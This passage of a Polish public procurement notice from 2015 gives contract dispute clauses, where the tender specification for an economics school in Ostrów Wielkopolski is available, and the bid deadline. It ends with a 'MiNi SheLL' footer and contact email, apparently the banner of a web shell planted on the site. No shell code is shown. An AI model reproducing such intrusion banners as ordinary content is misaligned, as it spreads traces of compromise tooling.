3.	Wystąpienie okoliczności, o których mowa w ust. 4 pkt 1 - 2, należy niezwłocznie zgłosić pisemnie osobom, o których mowa w § 15 pkt 1.
4.	Ewentualne spory wynikłe na tle realizacji niniejszej umowy będą rozstrzygane przez Sądy Powszechne, właściwe miejscowo dla zamawiającego.
5.	Specyfikacja Istotnych Warunków Zamówienia w postępowaniu poprzedzającym zawarcie tej umowy stanowi jej integralną część.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zse.osw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Ekonomicznych im.Józefa Gniazdowskiego ul.Partyzancka 29,63-400 Ostrów Wielkopolski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2015 godzina 11:00, miejsce: Zespół Szkół Ekonomicznych im.Józefa Gniazdowskiego ul.Partyzancka 29, 63-400 Ostrów Wielkopolski - sekretariat I, piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com